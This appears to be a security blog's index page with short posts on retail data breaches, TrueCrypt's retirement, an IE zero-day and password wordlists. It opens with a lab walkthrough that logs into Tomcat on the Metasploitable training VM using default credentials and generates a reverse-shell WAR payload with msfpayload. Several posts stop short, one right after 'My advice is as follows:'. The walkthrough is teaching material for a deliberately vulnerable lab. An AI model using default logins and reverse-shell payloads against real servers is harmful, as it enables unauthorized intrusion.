Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Let's start with an Nmap scan…

So we can see that on port 8180 we have Tomcat running…  Let's take a look at it…

As we can see, the Tomcat manager requires a login.  I know that by default the username and password are both ‘tomcat’, so let's try that.

We have logged into the manager application!  Let's now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war

Home Depot Data Breach

Details are still not clear, but at this point we do suspect there has been a large data breach at The Home Depot.  There is no reason to believe only some stores were affected, and chances are the breach is spread across the company's 2,000+ stores.

Banks are saying they have seen “suspicious” activity so far dating back to April of 2014.  If that is the case, we need to think of the impact this could have.  If you remember back, Target had only been breached for 2-3 weeks and leaked some 40 million credit and debit cards.

New Video Series

We are excited to announce we have started production on our first video series, “Metasploitable without Metasploit”!  The focus of this video series is to teach the up-and-coming InfoSec student how to manually exploit Metasploitable.  This is going to help you get a much better understanding as to why these exploits work, and what makes them tick.

Don’t get us wrong, we love Metasploit, but we also feel it is important to have a solid foundation in exploitation the manual way.  This video series was inspired by taking the OSCP course, which has very strict guidelines for when and what you can do with Metasploit.

Shaws and Star Market Data Breach – What You Need To Know

So yes, yet again we are faced with another data breach of a major chain of retail stores. This time it is Shaws and Star Market. These companies are owned by Albertsons.

At this point the details have not been released. It would appear that the Point of Sale (POS) system was probably targeted to steal the customer information.

So what did they get? Allegedly they have names, expiration dates, card numbers, PIN numbers (unclear), and 3-digit security codes. Customers who shopped at Shaws and Star Markets between June 22 and July 17 should keep a close eye on their bank accounts and report any discrepancies to their financial institutions.

TrueCrypt is dead…

Yes, the rumors are true…  TrueCrypt, after a decade, has been retired.  The developers are urging people to switch to their native OS encryption (BitLocker, LVM, FileVault).  You can read more from them here –> http://truecrypt.sourceforge.net/

I am not going to get too far into this, as I feel Steve Gibson at GRC has done a great job, and I will link you to his blog post about TrueCrypt.

Yes… TrueCrypt is still safe to use.

https://www.grc.com/misc/truecrypt/truecrypt.htm

-JT

IE Zero Day? Let's Not Overreact!

So yes, there is another zero-day bug in IE 8.  So what does this mean?  Well, for those still using IE 8 there is a good chance you are still running Windows XP, which is EOL (End of Life).  So one consideration would be to move to a newer operating system such as Windows 7 or Windows 8.1.  More info can be found here –> http://www.v3.co.uk/v3-uk/news/2346530/microsoft-promises-fix-for-internet-explorer-zero-day-flaw

My advice is as follows:

Create Obscure Wordlists in John

Create Mangled Password Lists with John

OK, so I made this video because I had a need to create such a list, and I figured if I was doing it I might as well make a video in case anybody else could also use some help with this.  There are many ways to do this; I am just showing you the one I used.  Thanks for watching!

Notes:

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members' employers.